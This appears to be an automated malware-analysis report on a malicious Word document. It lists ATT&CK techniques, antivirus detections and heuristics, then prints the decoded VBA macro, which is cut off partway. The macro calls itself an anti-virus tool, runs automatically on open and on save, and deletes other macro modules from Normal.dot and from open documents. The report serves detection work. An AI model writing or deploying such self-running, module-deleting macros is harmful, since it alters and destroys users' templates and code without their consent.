MALICIOUS (Risk Score: 200)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro includes AutoOpen and AutoExec functions, indicating it is designed to run automatically when the document is opened. ClamAV detections suggest it is a known trojan. The presence of AutoOpen and AutoExec macros strongly suggests this file was delivered as a spearphishing attachment.
Heuristics (4)
- ClamAV: Doc.Trojan.Opey-20 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Opey-20
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8064 bytes |

SHA-256: 7d53ec20554b899e2853e780afa26c4229a987e5a07bffa345ecd98e3cadd9c2
Detection (ClamAV): Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Second extracted module
Attribute VB_Name = "JiShenhua33"
' ------------------------------------------------------------------------------------
' Program design: 冀慎华 (Ji Shenhua), China Construction Bank Shandong Branch
' Date: March 2001
' Function: this program resets the Word menus and toolbars to their original state
'           and deletes every macro module other than this one.
'-------------------------------------------------------------------------------------
Const CurrentVersion = 33 ' version number
Const myName = "JiShenhua33" ' name of this program

Sub AutoExec()
    On Error Resume Next
    Call Initialize
    Call Immunize
End Sub

Sub AutoOpen()
    On Error Resume Next
    Call Initialize
    Call Immunize
End Sub

Sub FileOpen()
    On Error Resume Next
    Call Initialize
    Call Immunize
    Dialogs(wdDialogFileOpen).Show
    Call Immunize
End Sub

Sub FileSave()
    On Error Resume Next
    Call Initialize
    Call Immunize
    If Not ActiveDocument.Saved Then ActiveDocument.Save
End Sub

Sub FileSaveAs()
    On Error Resume Next
    Call Initialize
    Call Immunize
    Dialogs(wdDialogFileSaveAs).Show
End Sub

' Returns True when the document name looks like an unsaved default name
' ("文档N" in Chinese Word or "DocN" in English Word).
Function IsNewDoc(myDoc As Document) As Boolean
    Dim rightPart As String
    If (Left(myDoc.Name, 2) = "文档") Then
        rightPart = Right(myDoc.Name, Len(myDoc.Name) - 2)
        If IsNumeric(rightPart) Then IsNewDoc = True Else IsNewDoc = False
    ElseIf (Left(myDoc.Name, 3) = "Doc") Then
        rightPart = Right(myDoc.Name, Len(myDoc.Name) - 3)
        If IsNumeric(rightPart) Then IsNewDoc = True Else IsNewDoc = False
    Else
        IsNewDoc = False
    End If
End Function

' Walks the VBA project of Normal.dot and of every open document, removing
' all modules except this one (and "MyTools"), after prompting for unknown ones.
Function Immunize()
    On Error Resume Next
    Dim ModuleName$, OpenDocImmunized As Boolean
    Dim i%, J%, NmImmunized As Boolean
    Dim myInt As Integer
    Dim openDoc As Document
    NmImmunized = False
    For i = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
        ModuleName = NormalTemplate.VBProject.VBComponents(i).Name
        Select Case ModuleName
            Case "ThisDocument"
                myInt = NormalTemplate.VBProject.VBComponents(i).CodeModule.CountOfLines
                If myInt > 0 Then
                    NormalTemplate.VBProject.VBComponents(i).CodeModule.DeleteLines 1, myInt
                End If
            Case "MyTools"
            Case "VirusReport", "JiShenhua" ' older versions of the anti-virus program
                Application.OrganizerDelete _
                    Source:=NormalTemplate.FullName, _
                    Name:=ModuleName, _
                    Object:=wdOrganizerObjectProjectItems
            Case Else
                If Left(ModuleName, 9) = "JiShenhua" Then ' this program
                    myInt = Val(Right(ModuleName, 2))
                    If myInt < CurrentVersion Then ' an older version of this program
                        Application.OrganizerDelete _
                            Source:=NormalTemplate.FullName, _
                            Name:=ModuleName, _
                            Object:=wdOrganizerObjectProjectItems
                    Else
                        NmImmunized = True ' current or newer version of this program
                    End If
                Else ' other programs
                    msg = "你的 Word 系统中附带有宏程序模块 " + ModuleName + _
                          ", 极有可能是宏病毒,请选择 '是' 清除该病毒."
                    If MsgBox(msg, vbYesNo, "冀慎华向您报告:") = vbYes Then
                        Application.OrganizerDelete _
                            Source:=NormalTemplate.FullName, _
                            Name:=ModuleName, _
                            Object:=wdOrganizerObjectProjectItems
                    End If
                End If
        End Select
    Next i
    For Each openDoc In Documents
        OpenDocImmunized = False
        For J = openDoc.VBProject.VBComponents.Count To 1 Step -1
            ModuleName = openDoc.VBProject.VBComponents(J).Name
            Select Case ModuleName
                Case "ThisDocument"
                    myInt = openDoc.VBProject.VBComponents(J).CodeModule.CountOfLines
                    If myInt > 0 Then
```

... (truncated)